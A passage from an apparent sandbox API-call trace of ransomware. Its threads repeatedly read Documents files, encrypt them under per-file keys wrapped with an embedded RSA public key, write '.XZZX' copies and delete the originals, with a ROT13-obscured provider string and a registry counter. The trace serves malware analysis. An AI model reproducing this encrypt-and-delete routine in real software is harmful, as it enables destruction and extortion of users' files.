dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1422a [0035.996] WriteFile (in: hFile=0x434, lpBuffer=0x3f8f860*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3f8f860*, lpNumberOfBytesWritten=0x3f8e438*=0x20, lpOverlapped=0x0) returned 1 [0035.996] SetFilePointer (in: hFile=0x434, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1424a [0035.996] WriteFile (in: hFile=0x434, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0035.996] SetFilePointer (in: hFile=0x434, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1424f [0035.996] SetErrorMode (uMode=0x1) returned 0x1 [0035.996] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0035.996] OutputDebugStringW (lpOutputString="end") [0035.996] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wXe5", cchString=0x0, dwFlags=0x0, pbBinary=0x3f8dbf4, pcbBinary=0x3f8d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3f8dbf4, pcbBinary=0x3f8d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0035.996] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x3f8dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x3f8d3dc, pcbStructInfo=0x3f8d3d8 | out: pvStructInfo=0x3f8d3dc, pcbStructInfo=0x3f8d3d8) returned 1 [0035.996] CryptAcquireContextW (in: phProv=0x3f8d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3f8d3e4*=0x3eb420) returned 1 [0035.997] CryptImportPublicKeyInfo (in: hCryptProv=0x3eb420, dwCertEncodingType=0x1, pInfo=0x3dd1be8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd1c18*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd1c20*, PublicKey.cUnusedBits=0x0), phKey=0x3f8d3ec | out: phKey=0x3f8d3ec*=0x324d78) returned 1 [0035.997] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0035.998] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0035.998] CryptEncrypt (in: hKey=0x324d78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3f8d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x3f8d3f0*=0x80) returned 1 [0035.998] CryptEncrypt (in: hKey=0x324d78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3eb4a8*, pdwDataLen=0x3f8d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3eb4a8*, pdwDataLen=0x3f8d3e8*=0x80) returned 1 [0035.998] WriteFile (in: hFile=0x434, lpBuffer=0x3eb4a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3eb4a8*, lpNumberOfBytesWritten=0x3f8e438*=0x80, lpOverlapped=0x0) returned 1 [0035.998] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0035.998] WriteFile (in: hFile=0x434, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0035.998] GetUserNameW (in: lpBuffer=0x3f8e1f8, pcbBuffer=0x3f8dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x3f8dfe0) returned 1 [0035.999] wsprintfW (in: param_1=0x3f8dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0035.999] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x3f8dfe4 | out: phkResult=0x3f8dfe4*=0x43c) returned 0x0 [0035.999] RegQueryValueExW (in: hKey=0x43c, lpValueName="E1010314", lpReserved=0x0, lpType=0x3f8dfd8, lpData=0x3f8dfec, lpcbData=0x3f8dfdc*=0x4 | out: lpType=0x3f8dfd8*=0x4, lpData=0x3f8dfec*=0xe, lpcbData=0x3f8dfdc*=0x4) returned 0x0 [0035.999] RegCloseKey (hKey=0x43c) returned 0x0 [0035.999] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x3f8dfe8 | out: phkResult=0x3f8dfe8*=0x43c) returned 0x0 [0035.999] RegSetValueExW (in: hKey=0x43c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x3f8dfec*=0xf, cbData=0x4 | out: lpData=0x3f8dfec*=0xf) returned 0x0 [0035.999] RegCloseKey (hKey=0x43c) returned 0x0 [0035.999] VirtualFree (lpAddress=0x4080000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.000] VirtualFree (lpAddress=0x4090000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.000] CloseHandle (hObject=0x434) returned 1 [0036.001] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0036.002] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0036.002] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8HoT4SPBYbm.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8hot4spbybm.xlsx")) returned 1 [0036.003] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8HoT4SPBYbm.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8hot4spbybm.xlsx")) returned 0 Thread: id = 106 os_tid = 0x260 [0036.034] lstrcpyA (in: lpString1=0x3f8fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0036.034] lstrcpyW (in: lpString1=0x3f8f460, lpString2="8njS1by2_oecbNC P4zy.pptx" | out: lpString1="8njS1by2_oecbNC P4zy.pptx") returned="8njS1by2_oecbNC P4zy.pptx" [0036.034] lstrcpyW (in: lpString1=0x3f8e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0036.034] SetErrorMode (uMode=0x1) returned 0x1 [0036.034] lstrcpyW (in: lpString1=0x3f8f860, lpString2="8njS1by2_oecbNC P4zy.pptx" | out: lpString1="8njS1by2_oecbNC P4zy.pptx") returned="8njS1by2_oecbNC P4zy.pptx" [0036.034] CoCreateGuid (in: pguid=0x3f8e440 | out: pguid=0x3f8e440*(Data1=0x96f374bc, Data2=0x8a52, Data3=0x4ead, Data4=([0]=0x94, [1]=0x17, [2]=0x43, [3]=0x41, [4]=0xc3, [5]=0x26, [6]=0x42, [7]=0x2d))) returned 0x0 [0036.034] wsprintfW (in: param_1=0x3f8ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8njS1by2_oecbNC P4zy.pptx") returned 69 [0036.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x3f8fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0036.034] wsprintfW (in: param_1=0x3f8e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\96E8BC382A82756A96F374BC2E7B59B2.XZZX") returned 81 [0036.034] StrStrW (lpFirst="8njS1by2_oecbNC P4zy.pptx", lpSrch="XZZX") returned 0x0 [0036.034] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8njS1by2_oecbNC P4zy.pptx", dwFileAttributes=0x20) returned 1 [0036.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8njS1by2_oecbNC P4zy.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8njs1by2_oecbnc p4zy.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0036.035] ReadFile (in: hFile=0x438, lpBuffer=0x3e2cd28, nNumberOfBytesToRead=0x14806, lpNumberOfBytesRead=0x3f8e418, lpOverlapped=0x0 | out: lpBuffer=0x3e2cd28*, lpNumberOfBytesRead=0x3f8e418*=0x14806, lpOverlapped=0x0) returned 1 [0036.035] CloseHandle (hObject=0x438) returned 1 [0036.035] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x4080000 [0036.036] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4090000 [0036.036] SetErrorMode (uMode=0x1) returned 0x1 [0036.036] lstrcpyW (in: lpString1=0x3f8e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0036.036] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3eb530) returned 1 [0036.039] CryptGenKey (in: hProv=0x3eb530, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x324c38) returned 1 [0036.132] CryptExportKey (in: hKey=0x324c38, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x3f8e41c | out: pbData=0x0*, pdwDataLen=0x3f8e41c*=0x94) returned 1 [0036.132] CryptExportKey (in: hKey=0x324c38, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4090000, pdwDataLen=0x3f8e41c | out: pbData=0x4090000*, pdwDataLen=0x3f8e41c*=0x94) returned 1 [0036.132] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0036.133] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0036.133] CryptDestroyKey (hKey=0x324c38) returned 1 [0036.133] CryptReleaseContext (hProv=0x3eb530, dwFlags=0x0) returned 1 [0036.133] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\96E8BC382A82756A96F374BC2E7B59B2.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\96e8bc382a82756a96f374bc2e7b59b2.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0036.134] WriteFile (in: hFile=0x438, lpBuffer=0x3e2cd28*, nNumberOfBytesToWrite=0x14806, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3e2cd28*, lpNumberOfBytesWritten=0x3f8e438*=0x14806, lpOverlapped=0x0) returned 1 [0036.135] SetFilePointer (in: hFile=0x438, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x14806 [0036.135] WriteFile (in: hFile=0x438, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0036.135] SetFilePointer (in: hFile=0x438, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1480b [0036.136] WriteFile (in: hFile=0x438, lpBuffer=0x3f8f860*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3f8f860*, lpNumberOfBytesWritten=0x3f8e438*=0x32, lpOverlapped=0x0) returned 1 [0036.136] SetFilePointer (in: hFile=0x438, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1483d [0036.136] WriteFile (in: hFile=0x438, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0036.136] SetFilePointer (in: hFile=0x438, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x14842 [0036.136] SetErrorMode (uMode=0x1) returned 0x1 [0036.136] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0036.136] OutputDebugStringW (lpOutputString="end") [0036.136] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wXe5", cchString=0x0, dwFlags=0x0, pbBinary=0x3f8dbf4, pcbBinary=0x3f8d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3f8dbf4, pcbBinary=0x3f8d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0036.136] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x3f8dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x3f8d3dc, pcbStructInfo=0x3f8d3d8 | out: pvStructInfo=0x3f8d3dc, pcbStructInfo=0x3f8d3d8) returned 1 [0036.136] CryptAcquireContextW (in: phProv=0x3f8d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3f8d3e4*=0x3eb530) returned 1 [0036.137] CryptImportPublicKeyInfo (in: hCryptProv=0x3eb530, dwCertEncodingType=0x1, pInfo=0x3dd1cb8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd1ce8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd1cf0*, PublicKey.cUnusedBits=0x0), phKey=0x3f8d3ec | out: phKey=0x3f8d3ec*=0x324db8) returned 1 [0036.137] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0036.138] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0036.138] CryptEncrypt (in: hKey=0x324db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3f8d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x3f8d3f0*=0x80) returned 1 [0036.138] CryptEncrypt (in: hKey=0x324db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3eb5b8*, pdwDataLen=0x3f8d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3eb5b8*, pdwDataLen=0x3f8d3e8*=0x80) returned 1 [0036.138] WriteFile (in: hFile=0x438, lpBuffer=0x3eb5b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3eb5b8*, lpNumberOfBytesWritten=0x3f8e438*=0x80, lpOverlapped=0x0) returned 1 [0036.138] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0036.138] WriteFile (in: hFile=0x438, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0036.138] GetUserNameW (in: lpBuffer=0x3f8e1f8, pcbBuffer=0x3f8dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x3f8dfe0) returned 1 [0036.138] wsprintfW (in: param_1=0x3f8dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0036.138] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x3f8dfe4 | out: phkResult=0x3f8dfe4*=0x440) returned 0x0 [0036.138] RegQueryValueExW (in: hKey=0x440, lpValueName="E1010314", lpReserved=0x0, lpType=0x3f8dfd8, lpData=0x3f8dfec, lpcbData=0x3f8dfdc*=0x4 | out: lpType=0x3f8dfd8*=0x4, lpData=0x3f8dfec*=0xf, lpcbData=0x3f8dfdc*=0x4) returned 0x0 [0036.138] RegCloseKey (hKey=0x440) returned 0x0 [0036.139] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x3f8dfe8 | out: phkResult=0x3f8dfe8*=0x440) returned 0x0 [0036.139] RegSetValueExW (in: hKey=0x440, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x3f8dfec*=0x10, cbData=0x4 | out: lpData=0x3f8dfec*=0x10) returned 0x0 [0036.139] RegCloseKey (hKey=0x440) returned 0x0 [0036.139] VirtualFree (lpAddress=0x4080000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.139] VirtualFree (lpAddress=0x4090000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.139] CloseHandle (hObject=0x438) returned 1 [0036.141] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0036.141] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0036.141] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8njS1by2_oecbNC P4zy.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8njs1by2_oecbnc p4zy.pptx")) returned 1 [0036.143] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8njS1by2_oecbNC P4zy.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8njs1by2_oecbnc p4zy.pptx")) returned 0 Thread: id = 107 os_tid = 0x850 [0036.189] lstrcpyA (in: lpString1=0x3f8fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0036.189] lstrcpyW (in: lpString1=0x3f8f460, lpString2="9sRvP5V9AccV.ods" | out: lpString1="9sRvP5V9AccV.ods") returned="9sRvP5V9AccV.ods" [0036.189] lstrcpyW (in: lpString1=0x3f8e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0036.190] SetErrorMode (uMode=0x1) returned 0x1 [0036.190] lstrcpyW (in: lpString1=0x3f8f860, lpString2="9sRvP5V9AccV.ods" | out: lpString1="9sRvP5V9AccV.ods") returned="9sRvP5V9AccV.ods" [0036.190] CoCreateGuid (in: pguid=0x3f8e440 | out: pguid=0x3f8e440*(Data1=0x98e66b96, Data2=0x57a3, Data3=0x4a37, Data4=([0]=0x84, [1]=0x6e, [2]=0x13, [3]=0x5c, [4]=0xb3, [5]=0xee, [6]=0xb7, [7]=0x3c))) returned 0x0 [0036.190] wsprintfW (in: param_1=0x3f8ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9sRvP5V9AccV.ods") returned 60 [0036.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x3f8fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0036.190] wsprintfW (in: param_1=0x3f8e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A9467A821967F20598E66B961D60D64D.XZZX") returned 81 [0036.190] StrStrW (lpFirst="9sRvP5V9AccV.ods", lpSrch="XZZX") returned 0x0 [0036.190] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9sRvP5V9AccV.ods", dwFileAttributes=0x20) returned 1 [0036.190] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9sRvP5V9AccV.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9srvp5v9accv.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0036.190] ReadFile (in: hFile=0x43c, lpBuffer=0x3e1aed8, nNumberOfBytesToRead=0x8728, lpNumberOfBytesRead=0x3f8e418, lpOverlapped=0x0 | out: lpBuffer=0x3e1aed8*, lpNumberOfBytesRead=0x3f8e418*=0x8728, lpOverlapped=0x0) returned 1 [0036.191] CloseHandle (hObject=0x43c) returned 1 [0036.191] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x4080000 [0036.192] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4090000 [0036.192] SetErrorMode (uMode=0x1) returned 0x1 [0036.192] lstrcpyW (in: lpString1=0x3f8e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0036.192] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3eb640) returned 1 [0036.198] CryptGenKey (in: hProv=0x3eb640, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x324c38) returned 1 [0036.316] CryptExportKey (in: hKey=0x324c38, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x3f8e41c | out: pbData=0x0*, pdwDataLen=0x3f8e41c*=0x94) returned 1 [0036.316] CryptExportKey (in: hKey=0x324c38, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4090000, pdwDataLen=0x3f8e41c | out: pbData=0x4090000*, pdwDataLen=0x3f8e41c*=0x94) returned 1 [0036.316] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0036.317] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0036.317] CryptDestroyKey (hKey=0x324c38) returned 1 [0036.317] CryptReleaseContext (hProv=0x3eb640, dwFlags=0x0) returned 1 [0036.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\A9467A821967F20598E66B961D60D64D.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\a9467a821967f20598e66b961d60d64d.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0036.317] WriteFile (in: hFile=0x43c, lpBuffer=0x3e1aed8*, nNumberOfBytesToWrite=0x8728, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3e1aed8*, lpNumberOfBytesWritten=0x3f8e438*=0x8728, lpOverlapped=0x0) returned 1 [0036.318] SetFilePointer (in: hFile=0x43c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: 